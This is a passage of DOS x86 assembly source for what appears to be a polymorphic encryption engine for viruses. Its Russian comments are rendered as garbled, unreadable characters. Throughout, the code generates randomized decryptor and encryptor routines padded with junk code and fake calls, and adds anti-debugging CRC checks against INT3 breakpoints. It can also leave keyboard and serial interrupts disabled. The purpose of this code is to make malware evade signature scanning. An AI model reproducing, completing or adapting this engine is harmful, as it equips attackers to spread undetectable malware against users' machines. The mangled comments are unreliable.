jz Used_ADD_2
mov ah,11101000b ; â®à®© ¡ ©â ¨§ ª®¬ ¤ë sub <reg>,1
or ah,byte ptr [bx+Register_In_Cyc]
push ax
call Boolean
pop ax
jz Big_SUB
mov al,10000011b ; ®à®âª¨© sub <reg>,1
call Store_Word
mov al,1
call Store_Byte
jmp Store_JNZ
Big_SUB:
mov al,10000001b ; «¨ë© sub <reg>,1
call Store_Word
mov ax,1
call Store_Word
jmp Store_JNZ
Used_ADD_2:
mov ax,1100000010000001b ; add <reg>,0ffffh
or ah,byte ptr [bx+Register_In_Cyc]
call Store_Word
xor ax,ax
dec ax
call Store_Word
jmp Store_JNZ
Used_INC_2:
call Boolean
jz Big_DEC
mov al,01001000b ; ®à®âª¨© dec <reg>
or al,byte ptr [bx+Register_In_Cyc]
call Store_Byte
jmp Store_JNZ
Big_DEC:
mov ax,1100100011111111b ; «¨ë© dec <reg>
or ah,byte ptr [bx+Register_In_Cyc]
call Store_Word
Store_JNZ:
mov al,01110101b ; ¥à¢ë© ¡ ©â - ¨áâàãªæ¨ï jnz
Store_Disp:
dec byte ptr [bx+UU] ; H¥ ¯p®¢¥pïâì ¤«¨ã ¯¥p¥å®¤ ç/§
jz Dont_Check_Size ; ª®¤, ¯¥p¥¤ î騩 Key Value ¢ ¡ãä¥p¥
push di
sub di,word ptr [bx+Where_Cycle]
jns Forward_Jump
neg di
Forward_Jump:
cmp di,7fh
pop di
jbe Dont_Check_Size
cmp ax,11100010b ;
᫨ ¡ë« ¯®¯ë⪠¨á¯®«ì§®¢ âì
je Register_Not_CX ; loop, â® ç¨ ¥¬ ¢á¥ á ç « ,
; ⪠¥®¡å®¤¨¬ ¤¥ªp¥¬¥â áç¥â稪 横«
mov ax,0300h+01110100b ; áâpãªæ¨ï jz $+5
call Store_Word
mov al,0e9h ; ¥p¢ë© ¡ ©â ¨áâpãªæ¨¨ jmp near ptr
call Store_Byte
mov ax,word ptr [bx+Where_Cycle]
sub ax,di
dec ax
dec ax
call Store_Word ; ë¥ ¨áâpãªæ¨¨ jmp near ptr
jmp _STC_Or_CLC2
Dont_Check_Size:
call Store_Byte
mov ax,word ptr [bx+Where_Cycle] ; ¤à¥á à §¬¥é¥¨ï loop/jnz
sub ax,di
dec ax ; ëç¨á«ï¥¬ ¯®«¥ disp
call Store_Byte
_STC_Or_CLC2:
STC_Or_CLC2 db ?
jc Exit_To_Anti_INT3
pop ax ; ax=first di
sub ax,di
neg ax ; ëç¨á«ï¥¬ ¤«¨ã ¢á¥£®, çâ® ¯®«ã稫®áì
add word ptr [bx+DeCoder_Size],ax
mov ax,di
sub ax,word ptr [bx+Where_CALL] ; ëç¨á«ï¥¬ (¢ ª®¤¥à¥) ¤à¥á
mov si,word ptr [bx+Where_Ini_Ofs]
mov word ptr [si],ax ; ç « è¨äà㥬ëå ¤ ëå
mov cx,Offset _Last_Codes-Offset Last_Codes
add ax,cx ; «ï encoder - ãç⥬ retn & etc
mov word ptr [si+Where_Encryptor],ax
push di
add di,Where_Encryptor
lea si,[bx+Last_Codes]
repnz movsb
pop di
pop si dx
Exit_To_Anti_INT3:
retn
Last_Codes:
mov ah,1
int 16h
jz All_Done
xor ax,ax
int 16h
jmp Last_Codes
All_Done:
in al,21h
and al,0e5h
out 21h,al
Noper = $
nop ; nop - íâ® ¥á«¨ 祣®-â® ¯¥p¥¤ ¥âáï ç/§ á⥪,
; ¨ ç¥ pop ax
retn ; retn ¢ encodere (¤«ï ¢®§¢p â ¢ $UPD)
_Last_Codes = $
Real_Last_Codes:
xor ax,ax
int 16h
sub ax,ax
int 16h
_RLC_ = $
in al,21h
and al,0e5h
out 21h,al
_Real_Last_Codes_ = $
;-----------------------------------------------------------------------;
; ¡«¨æ , ¨á¯®«ì§ã¥¬ ï ¤«ï ¯®áâ஥¨ï à á/§ è¨äà®¢ë¢ îé¨å ª®¬ ¤.
; ---®¬ ¤ë neg/not/inc/dec/rol/ror/rol(cl)/ror(cl)
; Þ????????Þ?????r/mÞ
; ---®¬ ¤ë xor/add/sub
; Þ????????Þ??reg r/mÞ
; ®à¬ â (1 í«¥¬¥â=2 ¡ ©â ):
; neg/not
; inc/rol
; rol(cl)
; add
; dec/ror
; ror(cl)
; sub/xor
Crypt_Codes db 11110111b,00011000b,11110111b,00010000b
db 11111111b,00000000b,11010001b,00000000b
db 11010011b,00000000b
Control_8 db 00000001b,00000000b
db 11111111b,00001000b,11010001b,00001000b
db 11010011b,00001000b
Control_9 db 00101001b,00000000b,00110001b,00000000b
_Crypt_Codes = $
Make_Crypt_Code endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà « ¦¨¢ ¥â ¤à¥á ¢ ¢ë§®¢ å ¯à®æ¥¤ãà ¨§ ¬¥¦¯à®æ¥¤ãன ;
; ®¡« á⨠(¢á¥£® ¤® 28 â ª¨å ¢ë§®¢®¢) ;
; 室: ¢á¥ â ¡«¨æë, á¢ï§ ë¥ á ¯à®æ¥¤ãà ¬¨, ¯à®¨¨æ¨ «¨§¨à®¢ ë ;
;-----------------------------------------------------------------------;
Correct_Calls proc near
push di si
xor cx,cx
mov cl,byte ptr [bx+Foreign_Calls_Count]
lea si,[bx+Foreign_Call_Table]
Repeat_Correct_Calls:
mov di,word ptr [si] ; ¤à¥á㥬áï ª â ¡«¨æ¥ ¤à¥á®¢ call'®¢
cmp cl,byte ptr [bx+Foreign_Calls_Count]
jne Usually_Choose
mov ax,word ptr [bx+Where_Init_Proc]
jmp Make_Init_Proc_Call
Usually_Choose:
mov al,byte ptr [bx+Calls_Count] ; ë¡¨à ¥¬ ®¤ã ¨§ ¨¬¥îé¨åáï
dec ax ; ¯à®æ¥¤ãà
call BRandom
shl ax,1
push bx
add bx,ax ; ¤à¥á㥬áï ª â ¡«¨æ¥ ¤à¥á®¢ ¯à®æ¥¤ãà
mov ax,word ptr [bx+Call_Table]
pop bx
Make_Init_Proc_Call:
sub ax,di
dec ax
dec ax
call Store_Word
inc si
inc si
loop Repeat_Correct_Calls
mov ax,word ptr [bx+Where_Reg_Ini]
dec ax
dec ax
push ax ; ®pp¥ªæ¨ï ¢ë§®¢®¢ ª®¤ ç «ì®© ¨¨-
mov di,word ptr [bx+Calls_Reg_Ini]
sub ax,di ; æ¨ «¨§ 樨 ¢á¥å p¥£¨áâp®¢
call Store_Word
pop ax
mov di,word ptr [bx+Calls_Reg_Ini+2]
sub ax,di
call Store_Word
pop si di
retn
Correct_Calls endp
;-----------------------------------------------------------------------;
; p®æ¥¤ãpª £¥¥p¨â ª®¤, ª®â®pë© ¡ã¤¥â § è¨äp®¢ ¢¬¥á⥠á è¨äp㥬®© ;
; ¯p®£p ¬¬®©. ®á«¥ 横« ¤¥ª®¤¨£ ã¯p ¢«¥¨¥ ¯¥p¥¤ ¥âáï ¥¬ã ;
; 室: di=㪠§ â¥«ì § ENCODER ( ¥ decoder) ;
;-----------------------------------------------------------------------;
Last_Code proc near
push ax si cx
lea si,[bx+Real_Last_Codes]
mov cx,_Real_Last_Codes_-Real_Last_Codes
test byte ptr [bx+Params],00001000b
jz @@ABC ; H¥ § ¯p¥é âì IRQ 1,3,4
mov cx,_RLC_-Real_Last_Codes ; ¯p¥â¨âì IRQ 1,3,4
@@ABC:
repnz movsb
Dont_Return_Key_Value:
pop cx si ax
retn
Last_Code endp
;-----------------------------------------------------------------------;
; ®â, ª®¥æ-â® ¨ á ¬ £« ¢ ï ¯à®æ¥¤ãà ¬ãâ â®à ;) ;
; 室: ah=¯ p ¬¥âpë ¯®áâp®¥¨ï è¨äp®¢é¨ª®¢/p áè¨äp®¢é¨ª®¢: ;
; bit 0: 1=¨á¯®«ì§®¢ âì ¢ë§®¢ë int 21h, 0=¥ ¨á¯®«ì§®¢ âì ;
; bit 1: 1=¯¥p¥¤ ¢ âì ¢ á⥪¥ ª«îç (¨§ bx), 0=¥ ¯¥p¥¤ ¢ âì ;
; bit 2: 1=¯¥p¥¤ âì ª«îç (¨§ dx) ¢ ª« ¢¨ âãp®¬ ¡ãä¥p¥ ª ª ;
; ¤¢ á«®¢ (á¬. ¤®ªã), 0=¥ ¯¥p¥¤ ¢ âì ;
; bit 3: 1=®áâ ¢¨âì § ¯p¥é¥.IRQ 1,3,4, 0=p §p¥è¨âì ¢á¥ IRQ ;
; bx=ª«îç, ¯¥p¥¤ ¢ ¥¬ë© ¢ á⥪¥, ¥á«¨ bit 1 ¢ ah=1 ;
; dx=ª«îç, ¯¥p¥¤ ¢ ¥¬ë© ¢ ¡ãä¥p¥, ¥á«¨ bit 2 ¢ ah=1 ;
; ds:si= ¤à¥á è¨äà㥬®£® ª®¤ ,es:di= ¤à¥á ¡ãä¥à ¯®¤ è¨ä஢ ë© ;
; ª®¤, ds=es=cs, cx=¤«¨ è¨äà㥬®© ç á⨠;
; ë室: es:di ᮤ¥à¦¨â § è¨ä஢ ë© ª®¤ á à áè¨ä஢騪®¬ ;
; cx=¤«¨ § è¨ä஢ ®£® ª®¤ ;
;-----------------------------------------------------------------------;
$UPD proc near
pushf
push ax bx dx di si bp
push bx
cld
call $+3
pop bx
sub bx,Offset $-1
mov byte ptr [bx+Params],ah
mov word ptr [bx+Key_Value],dx
pop word ptr [bx+Stack_Value]
call Init_$UPD ; ¨æ¨ «¨§¨à㥬 ¥ª®â®àë¥ ¯¥à¥¬¥ë¥. ®§¤ ¥¬
call Build_Cryptors ; à áè¨ä஢騪 ¯® ¤à¥áã es:di ¨ è¨ä஢騪 ¯®
; ¯® ¤à¥áã es:[di+Where_Encryptor]
call Crypting ; ¨äà㥬 ¤ ë¥
mov cx,word ptr [bx+Code_Length] ; «¨ã § ª®¤¨à®¢ ëå ¤ ëå
add cx,word ptr [bx+DeCoder_Size] ; ¢®§¢à é ¥¬ ¢ cx
pop bp si di dx bx ax
popf
ret
$UPD endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãઠ¨¨æ¨ «¨§¨àã¥â ¥ª®â®àë¥ ¯¥à¥¬¥ë¥ ;
; 室: cx=¤«¨ è¨äà㥬®© ¯à®£à ¬¬ë ;
; ë室: Method_Table ᮤ¥à¦¨â TLength ¡ ©â, ¨¬¥îé¨å § 票¥: ;
; 0=neg, 1=not, 2=inc, 3=rol, 4=rol(cl), 5=add, 6=dec, 7=ror, ;
; 8=ror(cl), 9=sub, 10=xor ;
; (¥¦¤ã ®¬¥à ¬¨ ᨬ¬¥âà¨çëå ®¯¥à 権 à §®áâì 4: ror-rol=7-3=4) ;
; Key_Table ᮤ¥à¦¨â ॣ¨áâàë-ª«îç¨ ¯à¨ è¨ä஢ª¥ (¥ SP) ;
; Code_Length=¤«¨ è¨äà㥬®© ¯à®£à ¬¬ë ;
;-----------------------------------------------------------------------;
Init_$UPD proc near
push di si cx
;---[¨æ¨ «¨§ æ¨ï ¥ª®â®àëå ¯¥à¥¬¥ëå]---------------------------------;
add cx,_Real_Last_Codes_-Real_Last_Codes
test byte ptr [bx+Params],00001000b
jz Enable_IRQs
sub cx,_Real_Last_Codes_-_RLC_
Enable_IRQs:
mov word ptr [bx+Code_Length],cx
xor ax,ax
mov word ptr [bx+DeCoder_Size],ax
mov byte ptr [bx+Calls_Count],ah
mov byte ptr [bx+Foreign_Calls_Count],al
mov byte ptr [bx+UU],al
call Boolean
mov byte ptr [bx+For_Cryptor],al
mov byte ptr [bx+When_30],4
;---[¨æ¨ «¨§ æ¨ï Method_Table]-----------------------------------------;
mov al,6 ; ë¡¨à ¥¬ ®â 4 ¤® 10-⨠ª®¬ ¤-
call BRandom ; è¨ä஢騪®¢
add al,4
xchg cx,ax
mov word ptr [bx+TLength],cx
lea di,[bx+Method_Table]
Init_Method_Table_Loop:
mov al,10 ; ë¡¨à ¥¬ ¨§ 11-⨠⨯®¢ ¨áâàãªæ¨©
call BRandom
stosb
loop Init_Method_Table_Loop
;---[¨æ¨ «¨§ æ¨ï Register_In_...
]--------------------------------------;
Repeat_Define_1:
mov al,111b
call BRandom ; ë¡¨à ¥¬ ॣ¨áâà ¤«ï ¤à¥á 樨 ¢ ¤¥ª®¤¥à¥
cmp al,101b
jae @@Defined1 ; ¥£¨áâàë bp/si/di
cmp al,011b
jne Repeat_Define_1 ; ¥£¨áâà bx
@@Defined1:
mov byte ptr [bx+Register_In_Ofs],al
Repeat_Define_2:
mov al,111b
call BRandom ; ë¡¨à ¥¬ ॣ¨áâà ¤«ï 横«
xchg cx,ax
call Test_SP
xchg cx,ax
cmp al,byte ptr [bx+Register_In_Ofs]
je Repeat_Define_2
mov byte ptr [bx+Register_In_Cyc],al
Repeat_Define_3:
mov al,111b
call BRandom
xchg cx,ax
call Test_SP
xchg cx,ax
cmp al,byte ptr [bx+Register_In_Ofs]
je Repeat_Define_3
cmp al,byte ptr [bx+Register_In_Cyc]
je Repeat_Define_3
mov byte ptr [bx+Register_In_Crypt],al
;---[¨æ¨ «¨§ æ¨ï Register_In_Dis]--------------------------------------;
mov al,byte ptr [bx+Register_In_Ofs]
call Convert_Reg2RM
mov byte ptr [bx+Register_In_Dis],al
mov cx,(Offset _$UPD_ID-Offset $UPD_ID)/2
xor di,di
lea si,[bx+$UPD_ID]
Check_$UPD:
lodsw
xor di,ax
loop Check_$UPD
cmp di,0c1abh ; ®â஫ì ï á㬬 áâப¨ $UPD_ID
jne Not_Correct
;---[¨æ¨ «¨§ æ¨ï Key_Table]--------------------------------------------;
mov cx,word ptr [bx+TLength]
push cx
lea di,[bx+Key_Table]
push di
Init_Key_Table_Loop:
mov al,111b ; ë¡¨à ¥¬ ®ç¥à¥¤®© ॣ¨áâà-ª«îç è¨ä஢ª¨
call BRandom
xchg cx,ax
call Test_SP
xchg cx,ax
cmp al,byte ptr [bx+Register_In_Ofs]
je Init_Key_Table_Loop ; «îç è¨ä஢ª¨ ¥ ¤®«¦¥ ᮢ¯ ¤ âì á
cmp al,byte ptr [bx+Register_In_Crypt]
je Init_Key_Table_Loop ; p¥£¨áâp®¬ ¤p¥á 樨 ¨ ¢áâp¥ç âìáï 1 p §
@@SKIP8: ;
᫨ ® ᮢ¯ ¤ ¥â á Register_In_Crypt,
shl al,3 ; â® íâ® ¤®«¦ ¡ëâì ¥ xor-ª®¬ ¤
stosb
loop Init_Key_Table_Loop
; «ãç ©ãî ª®¬ ¤ã ¢ p áè¨äp®¢é¨ª¥ § ¬¥ï¥¬ xor á p¥£¨áâp®¬, ᮤ¥p¦ 饬
; CRC ¤¥ª®¤¥p
pop di ; di=[bx+Key_Table]
pop ax ; ax=word ptr [bx+TLength]
dec ax
call BRandom
add di,ax
mov al,byte ptr [bx+Register_In_Crypt]
shl al,3
mov byte ptr [di-M_K],10
stosb
pop cx si di
Not_Correct:
retn
Init_$UPD endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà áâந⠯®«¨¬®àä¨ç¥áª¨© ¤¥ª®¤¥à ;
; 室: ¡«¨æë Method_Table ¨ Key_Table ¨¨æ¨ «¨§¨à®¢ ë ;
; es:di= ¤à¥á ¡ãä¥à ¯®¤ ª®¤¥à ;
; ë室: DeCoder_Size=¤«¨ à ᪮¤¨à®¢é¨ª , di=㪠§ â¥«ì § decoder ;
;-----------------------------------------------------------------------;
Build_Cryptors proc near
push ax si
;---[ ¨¬ ¥¬áï ¥à㤮© - £¥¥à¨¬ ¢áïªãî çãèì, «¨èì ¡ë ¥ ¢¨á¥« ;)]-----;
mov word ptr [bx+Encoder_Entry],di
push cx
mov al,4 ; ®§¤ ¥¬ ®â 2 ¤® 6 ¯à®æ¥¤ãà, á® ¢á直¬¨
call BRandom ; ¢ë§®¢ ¬¨ ¨ ¯¥à¥å®¤ ¬¨
add al,2
mov cx,ax
dec ax
dec ax
call BRandom ; ª ªãî ¨§ ¯p®æ¥¤ãp ¯®¬¥áâ¨âì ¯®¬¥å®ãá⮩稢ë©
inc ax ; «¨§ â®p (®¬¥p ¢ ax)
call Make_Routine ; <- ⮫쪮 ¥ ¢ íâã :)
dec cx
mov byte ptr [bx+Noper],90h ; nop
test byte ptr [bx+Params],00000010b
jz Repeat_Make_Routines
mov byte ptr [bx+Noper],01011000b ; pop ax
push ax cx dx ; â «ª¨¢ ¥¬ á«®¢® ¢ á⥪
push di
call Random_Empty_Code
mov dl,1
mov ah,byte ptr [bx+Register_In_Crypt]
call Entry_For_Make_Init_Routine_Proc_Call
mov ax,word ptr [bx+Stack_Value]
dec di
dec di
stosw
call Random_Empty_Code
mov al,01010000b
or al,byte ptr [bx+Register_In_Crypt]
call Random_Store_Byte
pop ax
sub ax,di
neg ax
add word ptr [bx+DeCoder_Size],ax
pop dx cx ax
Repeat_Make_Routines:
call Make_Routine
loop Repeat_Make_Routines
pop cx
;---[®§¤ ¥¬ ç «ìãî ¨¨æ¨ «¨§ æ¨î ॣ¨áâ஢-ª«î祩]-------------------;
add word ptr [bx+Encoder_Entry],Where_Encryptor
call Make_Rubbish
;---[®§¤ ¥¬ ®á®¢®¥ ⥫® ª®¤¥à ¨ ¤¥ª®¤¥à ]----------------------------;
call Make_Crypt_Code ; ®§¤ ¥¬ ⥫ ª®¤¥p ¨ ¤¥ª®¤¥p
call Correct_Calls ; ®à४â¨à㥬 ¢¥¯à®æ¥¤ãàë¥ ¢ë§®¢ë
pop si ax
retn
Build_Cryptors endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà ¯®¤£®â®¢ª¨ ª®¥ç®£® १ã«ìâ â - è¨ä஢ ¨ï ¤ ëå ¨ ;
; ¯à¨ªà¥¯«¥¨ï ª ¨¬ £®â®¢®£® à ᪮¤¨à®¢é¨ª (decryptor) ;
; 室: si=㪠§ ⥫ì è¨äàã¥¬ë¥ ¤ ë¥, di=㪠§ â¥«ì § decoder ;
;-----------------------------------------------------------------------;
Crypting proc near
inc word ptr [bx+Code_Length] ;###
push di di ; ®¤áâp®©ª¨ ¯®¬¥å®§ é¨é. ª®¤
sub di,word ptr [bx+DeCoder_Size] ; H ç «® ¤¥ª®¤¥p
sub di,word ptr [bx+Where_INT3_CALL]
xchg di,ax
mov di,word ptr [bx+Where_INT3_Ini_Ofs]
stosw ; ¤p¥á ¯®¤áç¥â CRC ¤«ï ¤¥ª®¤¥p
sub ax,Where_Encryptor
add di,Where_Encryptor-2
stosw ; ¤p¥á ¯®¤áç¥â CRC ¤«ï ¥ª®¤¥p
mov di,word ptr [bx+Where_INT3_Ini_Size]
mov ax,word ptr [bx+DeCoder_Size]
shr ax,1 ; ¥p¥¢®¤¨¬ ¤«¨ã ¨§ ¡ ©â ¢ á«®¢
call Store_Word
pop di
add di,Where_Encryptor+(Offset _Last_Codes-Offset Last_Codes)
push di
call Last_Code ; di=㪠§ â¥«ì § encoder
mov cx,word ptr [bx+Code_Length]
push cx
sub cx,_Real_Last_Codes_-Real_Last_Codes
test byte ptr [bx+Params],00001000b
jz @@ABC
add cx,_Real_Last_Codes_-_RLC_
@@ABC:
push bx
repnz movsb ; ®¯¨à㥬 è¨äàã¥¬ë© ª®¤ § encoder ...
call Rep_Clear_Buffer ; ç¨é ¥¬ ¡ãä¥p â®â á«ãç ©, ¥á«¨ ª ª®©-¨¡ã¤ì
; ¨¤¨®â ¢§¤ã¬ « ¯® ¦¨¬ âì ª®¯®çª¨ :(
call word ptr [bx+Encoder_Entry] ; ... ¨ è¨äà㥬 ¥£®
cld ; « £¨ ¬®£ãâ ¡ëâì ¨á¯®àç¥ë
pop bx cx si di
repnz movsb ; ¥à¥®á¨¬ § è¨ä஢ ë© ª®¤ § decryptor
retn
Crypting endp
$UPD_Top = $
end
